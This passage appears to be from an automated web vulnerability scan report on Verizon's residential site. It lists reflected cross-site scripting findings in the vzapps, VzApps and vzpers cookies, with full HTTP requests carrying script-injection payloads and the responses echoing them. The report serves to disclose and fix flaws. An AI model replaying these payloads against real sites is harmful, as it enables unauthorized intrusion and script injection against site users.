vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 138948
Expires: Sat, 20 Nov 2010 03:28:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:28:55 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:55 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:55 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:28:55 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "5c95e"-alert(1)-"deeeb3c52e9"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
var m_view = new VZT.MasterNavView();
var m_mod
...[SNIP]...

2.895. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 323cd'><script>alert(1)</script>db7eded9442 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX323cd'><script>alert(1)</script>db7eded9442; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 129776
Expires: Sat, 20 Nov 2010 00:13:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:52 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:52 GMT; path=/
Set-Cookie: ContextInfo_State=TX323cd'><script>alert(1)</script>db7eded9442; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:52 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:52 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:52 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX323CD'><SCRIPT>ALERT(1)</SCRIPT>DB7EDED9442 ' />
...[SNIP]...

2.896. http://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6db83'><script>alert(1)</script>29aa0ccd992 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX6db83'><script>alert(1)</script>29aa0ccd992; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77956
Expires: Sat, 20 Nov 2010 00:11:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:42 GMT; path=/
Set-Cookie: ContextInfo_State=TX6db83'><script>alert(1)</script>29aa0ccd992; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:42 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX6DB83'><SCRIPT>ALERT(1)</SCRIPT>29AA0CCD992 ' />
...[SNIP]...

2.897. http://www22.verizon.com/Residential/HighSpeedInternet [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cfc4'><script>alert(1)</script>fd78a1ef0ca was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4cfc4'><script>alert(1)</script>fd78a1ef0ca; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70302
Expires: Sat, 20 Nov 2010 00:12:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:38 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4cfc4'><script>alert(1)</script>fd78a1ef0ca; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4CFC4'><SCRIPT>ALERT(1)</SCRIPT>FD78A1EF0CA ' />
...[SNIP]...

2.898. http://www22.verizon.com/Residential/HighSpeedInternet/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b82d'><script>alert(1)</script>f8ced5a7994 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX5b82d'><script>alert(1)</script>f8ced5a7994; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71904
Expires: Sat, 20 Nov 2010 03:14:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:27 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX5b82d'><script>alert(1)</script>f8ced5a7994; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5B82D'><SCRIPT>ALERT(1)</SCRIPT>F8CED5A7994 ' />
...[SNIP]...

2.899. http://www22.verizon.com/Residential/HighSpeedInternet/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fff9'><script>alert(1)</script>5f319f2b2d3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8fff9'><script>alert(1)</script>5f319f2b2d3; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71904
Expires: Sat, 20 Nov 2010 00:10:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8fff9'><script>alert(1)</script>5f319f2b2d3; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8FFF9'><SCRIPT>ALERT(1)</SCRIPT>5F319F2B2D3 ' />
...[SNIP]...

2.900. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/CheckAvailability/

Issue detail


The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 65b09'><script>alert(1)</script>cb2218c31f2 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX65b09'><script>alert(1)</script>cb2218c31f2; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64444
Expires: Sat, 20 Nov 2010 03:13:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:13:59 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX65b09'><script>alert(1)</script>cb2218c31f2; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX65B09'><SCRIPT>ALERT(1)</SCRIPT>CB2218C31F2 ' />
...[SNIP]...

2.901. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/ [vzpers cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/CheckAvailability/

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c2e6b'><script>alert(1)</script>7d4ddb44747 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 